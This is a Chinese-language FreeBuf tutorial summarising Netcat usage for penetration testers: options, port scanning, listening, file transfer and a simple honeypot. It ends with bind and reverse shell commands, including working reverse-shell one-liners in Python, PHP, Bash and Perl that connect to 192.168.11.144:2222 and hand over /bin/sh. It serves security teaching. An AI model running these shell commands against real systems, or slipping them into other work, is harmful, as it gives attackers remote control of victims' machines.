“瑞士军刀”Netcat使用方法总结

前言

最近在做渗透测试的时候遇到了端口监听和shell的反弹问题，在这个过程中自己对Netcat这一款神器有了新的认识，现将一些Netcat的用法做一个小总结，希望对各位有帮助！

Netcat简介

Netcat是一款非常出名的网络工具，简称“NC”,有渗透测试中的“瑞士军刀”之称。它可以用作端口监听、端口扫描、远程文件传输、还可以实现远程shell等功能。总之功能强大，可以用一句较为风趣的话来描述NC的强大——“你的想象力是局限NC的瓶颈”。

Netcat选项参数说明

功能说明：端口扫描、端口监听、远程文件传输、远程shell等等;

语　　法：nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>][-s<来源位址>][-v...][-w<超时秒数>][主机名称][通信端口...]

参　　数：

-g <网关> 设置路由器跃程通信网关，最多可设置8个；

-G <指向器数目> 设置来源路由指向器，其数值为4的倍数；

-h 在线帮助；

-i <延迟秒数> 设置时间间隔，以便传送信息及扫描通信端口；

-l 使用监听模式，管控传入的资料；

-n 直接使用IP地址，而不通过域名服务器；

-o <输出文件> 指定文件名称，把往来传输的数据以16进制字码倾倒成该文件保存；

-p <通信端口> 设置本地主机使用的通信端口；

-r 乱数指定本地与远端主机的通信端口；

-s <来源位址> 设置本地主机送出数据包的IP地址；

-u 使用UDP传输协议；

-v 显示指令执行过程；

-w <超时秒数> 设置等待连线的时间；

-z 使用0输入/输出模式，只在扫描通信端口时使用。

Netcat简易使用

连接到远程主机

命令：nc  -nvv Targert_IP  Targert_Port

监听本地主机

命令：nc  -l  -p  Local_Port

端口扫描

扫描指定主机的单一端口是否开放

格式：nc  -v  target_IP  target_Port

扫描指定主机的某个端口段的端口开放信息

格式：nc  -v  -z  Target_IP   Target_Port_Start  -  Target_Port_End

扫描指定主机的某个UDP端口段，并且返回端口信息

格式：nc -v   -z  -u  Target_IP  Target_Port_Start   -   Target_Port_End

扫描指定主机的端口段信息，并且设置超时时间为3秒

格式：nc  -vv（-v） -z  -w  time  Target_IP   Target_Port_Start-Targert_Port_End

端口监听

监听本地端口

格式：nc  -l  -p  local_Port

注：先设置监听（不能出现端口冲突），之后如果有外来访问则输出该详细信息到命令行

监听本地端口，并且将监听到的信息保存到指定的文件中

格式：nc -l  -p local_Port > target_File

连接远程系统

格式：nc Target_IP  Target_Port

之后可以运行HTTP请求

FTP匿名探测

格式：nc Targert_IP  21

文件传输

传输端：

格式：nc  Targert_IP  Targert_Port  <  Targert_File

接收端：

格式：nc   -l  Local_Port  >  Targert_File

简易聊天

本地主机

命令：nc   -l   8888

远程主机

命令：nc Targert_IP    Targert_Port

蜜罐

作为蜜罐使用1：

命令：nc -L -p  Port

注：使用“-L”参数可以不停的监听某一个端口，知道Ctrl+C为止

作为蜜罐使用2：

命令：nc -L -p  Port >log.txt

注：使用“-L”参数可以不停的监听某一个端口，知道Ctrl+C为止，同时把结果输出到log.txt文件中，如果把“>”改为“>>”即追加到文件之后。

这一个命令参数“-L”在Windows中有，现在的Linux中是没有这个选项的，但是自己可以去找找，这里只是想到了之前的这个使用，所以提出来简单介绍一下！

获取shell

简述：获取shell分为两种，一种是正向shell，一种是方向shell。如果客户端连接服务器端，想要获取服务器端的shell，那么称为正向shell，如果是客户端连接服务器，服务器端想要获取客户端的shell，那么称为反向shell

正向shell

本地主机：

命令：nc   Targert_IP  Targert_Port

目标主机：

命令：nc  -lvp  Targert_Port   -e  /bin/sh

反向shell

本地主机：

命令： nc -lvp  Target_Port

目标主机：

命令： nc  Targert_IP Targert_Port  -e /bin/sh

特殊情况——目标主机上没有Netcat，如何获取反向shell

在一般情况下，目标主机上一般都是不会有Netcat的，此时就需要使用其他替代的方法来实现反向链接达到攻击主机的目的，下面简单的介绍几种反向shell的设置。

python反向shell

目标主机端执行语句：

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.144",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

本地主机

目标主机

PHP反向shell

目标主机端执行语句：

php -r '$sock=fsockopen("192.168.11.144",2222);exec("/bin/sh -i <&3 >&3 2>&3");'

本地主机：

目标主机：

Bash反向shell

目标主机端执行语句：

bash -i>＆/dev/tcp/192.168.11.144/2222 0>＆1

本地主机：

目标主机：

Perl反向shell

目标主机端执行语句：

perl -e 'use Socket;$i="192.168.11.144";$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

本地主机

目标主机

注:书写的时候一定要注意这里单引号、双引号是英文格式的，不然会报错误！

总结：有一句话为“温故而知新”，同时又有一句话为“实践出真知”，当这两句话同时践行的时候，就会擦出不一样的火花，你会看到你之前未见到的，掌握到你之前生疏的技能！Netcat固然好用，但是也要经过实践才知道，那你还在等什么呢？

*本文作者：Fly鹏程万里，转载请注明来自 FreeBuf.COM